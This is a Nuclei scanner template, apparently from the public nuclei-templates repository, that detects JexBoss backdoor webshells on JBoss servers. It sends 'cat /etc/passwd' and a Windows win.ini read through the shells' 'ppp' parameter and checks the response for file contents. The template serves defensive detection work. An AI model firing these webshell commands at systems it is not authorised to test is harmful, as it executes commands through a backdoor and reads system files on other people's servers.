nuclei-templates/vulnerabilities/backdoor/jexboss-backdoor.yaml

39 lines
993 B
YAML
Raw Normal View History

2021-12-04 10:09:18 +00:00
id: jexboss-backdoor
info:
name: Jexboss Backdoor Webshell
author: UnkL4b
severity: critical
reference:
- https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A
- https://github.com/joaomatosf/jexboss
2021-12-21 15:31:11 +00:00
tags: backdoor,jboss,rce
2021-12-04 10:09:18 +00:00
requests:
- method: GET
path:
2021-12-21 15:27:06 +00:00
- "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('§command§')}}"
payloads:
command:
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
2021-12-04 10:09:18 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
2021-12-21 15:27:06 +00:00
- type: regex
2021-12-04 10:09:18 +00:00
part: body
2021-12-21 15:27:06 +00:00
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
2021-12-04 10:09:18 +00:00
- type: word
part: header
words:
2021-12-21 15:27:06 +00:00
- "X-Powered-By: Servlet"